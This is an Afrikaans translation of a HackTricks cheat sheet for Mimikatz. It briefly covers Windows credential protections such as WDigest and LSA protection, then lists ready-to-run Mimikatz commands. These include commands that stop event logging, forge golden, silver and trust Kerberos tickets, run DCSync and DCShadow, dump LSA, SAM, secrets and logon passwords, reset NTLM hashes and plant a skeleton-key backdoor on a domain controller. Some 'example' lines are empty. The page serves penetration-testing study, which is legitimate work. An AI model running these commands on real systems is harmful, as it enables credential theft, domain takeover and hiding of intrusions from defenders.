Mimikatz
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Hierdie bladsy is gebaseer op een van adsecurity.org. Kyk na die oorspronklike vir verdere inligting!
LM en Duidelike Teks in geheue
Vanaf Windows 8.1 en Windows Server 2012 R2 is daar beduidende maatreëls geïmplementeer om teen diefstal van geloofsbriewe te beskerm:
LM hashes en duidelike teks wagwoorde word nie meer in geheue gestoor om sekuriteit te verbeter nie. 'n Spesifieke registrasie instelling, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential" moet geconfigureer word met 'n DWORD waarde van
0
om Digest Authentication te deaktiveer, wat verseker dat "duidelike teks" wagwoorde nie in LSASS gegee word nie.LSA Beskerming word bekendgestel om die Plaaslike Sekuriteitsowerheid (LSA) proses te beskerm teen ongeoorloofde geheue lees en kode-inspuiting. Dit word bereik deur die LSASS as 'n beskermde proses te merk. Aktivering van LSA Beskerming behels:
Die registrasie te wysig by HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa deur
RunAsPPL
opdword:00000001
te stel.'n Groep Beleidsobjek (GPO) te implementeer wat hierdie registrasie verandering oor bestuurde toestelle afdwing.
Ten spyte van hierdie beskermings, kan gereedskap soos Mimikatz LSA Beskerming omseil deur spesifieke bestuurders te gebruik, alhoewel sulke aksies waarskynlik in gebeurtenislogs aangeteken sal word.
Teenwerking van SeDebugPrivilege Verwydering
Administrateurs het tipies SeDebugPrivilege, wat hulle in staat stel om programme te debugeer. Hierdie voorreg kan beperk word om ongeoorloofde geheue dumps te voorkom, 'n algemene tegniek wat deur aanvallers gebruik word om geloofsbriewe uit geheue te onttrek. Maar, selfs met hierdie voorreg verwyder, kan die TrustedInstaller rekening steeds geheue dumps uitvoer deur 'n aangepaste dienskonfigurasie:
Dit stel die dumping van die lsass.exe
geheue na 'n lêer in, wat dan op 'n ander stelsel ontleed kan word om kredensiale te onttrek:
Mimikatz Opsies
Event log manipulasie in Mimikatz behels twee primêre aksies: die skoonmaak van gebeurtenislogs en die patching van die gebeurtenisdienste om die registrasie van nuwe gebeurtenisse te voorkom. Hieronder is die opdragte om hierdie aksies uit te voer:
Skoonmaak van Gebeurtenislogs
Opdrag: Hierdie aksie is daarop gemik om die gebeurtenislogs te verwyder, wat dit moeiliker maak om kwaadwillige aktiwiteite te volg.
Mimikatz bied nie 'n direkte opdrag in sy standaard dokumentasie vir die skoonmaak van gebeurtenislogs direk via sy opdraglyn nie. Dit behels egter tipies die gebruik van stelsels gereedskap of skripte buite Mimikatz om spesifieke logs skoon te maak (bv. deur PowerShell of Windows Event Viewer te gebruik).
Eksperimentele Kenmerk: Patching van die Gebeurtenisdienste
Opdrag:
event::drop
Hierdie eksperimentele opdrag is ontwerp om die gedrag van die Gebeurtenis Registrasie Dienste te wysig, wat effektief voorkom dat dit nuwe gebeurtenisse opneem.
Voorbeeld:
mimikatz "privilege::debug" "event::drop" exit
Die
privilege::debug
opdrag verseker dat Mimikatz met die nodige voorregte werk om stelseldienste te wysig.Die
event::drop
opdrag patch dan die Gebeurtenis Registrasie diens.
Kerberos Tekenaanvalle
Goue Teken Skepping
'n Goue Teken stel in staat tot domein-wye toegang impersonasie. Sleutelopdrag en parameters:
Opdrag:
kerberos::golden
Parameters:
/domain
: Die domeinnaam./sid
: Die domein se Veiligheidsidentifiseerder (SID)./user
: Die gebruikersnaam om te impersonate./krbtgt
: Die NTLM-hash van die domein se KDC-diensrekening./ptt
: Injekting van die teken direk in geheue./ticket
: Stoor die teken vir later gebruik.
Voorbeeld:
Silver Ticket Creation
Silver Tickets bied toegang tot spesifieke dienste. Sleutelopdrag en parameters:
Opdrag: Soortgelyk aan Golden Ticket, maar teiken spesifieke dienste.
Parameters:
/service
: Die diens om te teiken (bv., cifs, http).Ander parameters soortgelyk aan Golden Ticket.
Voorbeeld:
Trust Ticket Creation
Trust Tickets word gebruik om toegang tot hulpbronne oor domeine te verkry deur vertrouensverhoudings te benut. Sleutelopdrag en parameters:
Opdrag: Soortgelyk aan Golden Ticket, maar vir vertrouensverhoudings.
Parameters:
/target
: Die FQDN van die teiken-domein./rc4
: Die NTLM-hash vir die vertrouensrekening.
Voorbeeld:
Bykomende Kerberos Opdragte
Lys Kaartjies:
Opdrag:
kerberos::list
Lys alle Kerberos kaartjies vir die huidige gebruikersessie.
Gee die Kas:
Opdrag:
kerberos::ptc
Injekter Kerberos kaartjies vanaf kaslêers.
Voorbeeld:
mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit
Gee die Kaartjie:
Opdrag:
kerberos::ptt
Laat toe om 'n Kerberos kaartjie in 'n ander sessie te gebruik.
Voorbeeld:
mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit
Verwyder Kaartjies:
Opdrag:
kerberos::purge
Verwyder alle Kerberos kaartjies uit die sessie.
Nuttig voor die gebruik van kaartjie manipulasie opdragte om konflikte te vermy.
Aktiewe Gids Manipulasie
DCShadow: Tydelik 'n masjien laat optree as 'n DC vir AD objek manipulasie.
mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit
DCSync: Naboots 'n DC om wagwoorddata aan te vra.
mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit
Krediettoegang
LSADUMP::LSA: Trek krediete uit LSA.
mimikatz "lsadump::lsa /inject" exit
LSADUMP::NetSync: Naboots 'n DC met 'n rekenaarrekening se wagwoorddata.
Geen spesifieke opdrag verskaf vir NetSync in oorspronklike konteks.
LSADUMP::SAM: Toegang tot plaaslike SAM databasis.
mimikatz "lsadump::sam" exit
LSADUMP::Secrets: Dekripsie van geheime wat in die registrasie gestoor is.
mimikatz "lsadump::secrets" exit
LSADUMP::SetNTLM: Stel 'n nuwe NTLM-hash vir 'n gebruiker in.
mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit
LSADUMP::Trust: Verkry vertrouensverifikasie-inligting.
mimikatz "lsadump::trust" exit
Divers
MISC::Skeleton: Injekter 'n agterdeur in LSASS op 'n DC.
mimikatz "privilege::debug" "misc::skeleton" exit
Privilege Escalation
PRIVILEGE::Backup: Verkry rugsteunregte.
mimikatz "privilege::backup" exit
PRIVILEGE::Debug: Verkry foutopsporing regte.
mimikatz "privilege::debug" exit
Krediet Dumping
SEKURLSA::LogonPasswords: Toon krediete vir ingelogde gebruikers.
mimikatz "sekurlsa::logonpasswords" exit
SEKURLSA::Tickets: Trek Kerberos kaartjies uit geheue.
mimikatz "sekurlsa::tickets /export" exit
Sid en Token Manipulasie
SID::add/modify: Verander SID en SIDHistory.
Voeg by:
mimikatz "sid::add /user:targetUser /sid:newSid" exit
Wysig: Geen spesifieke opdrag vir wysiging in oorspronklike konteks.
TOKEN::Elevate: Naboots tokens.
mimikatz "token::elevate /domainadmin" exit
Terminal Dienste
TS::MultiRDP: Laat meerdere RDP sessies toe.
mimikatz "ts::multirdp" exit
TS::Sessions: Lys TS/RDP sessies.
Geen spesifieke opdrag verskaf vir TS::Sessions in oorspronklike konteks.
Kluis
Trek wagwoorde uit Windows Kluis.
mimikatz "vault::cred /patch" exit
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Last updated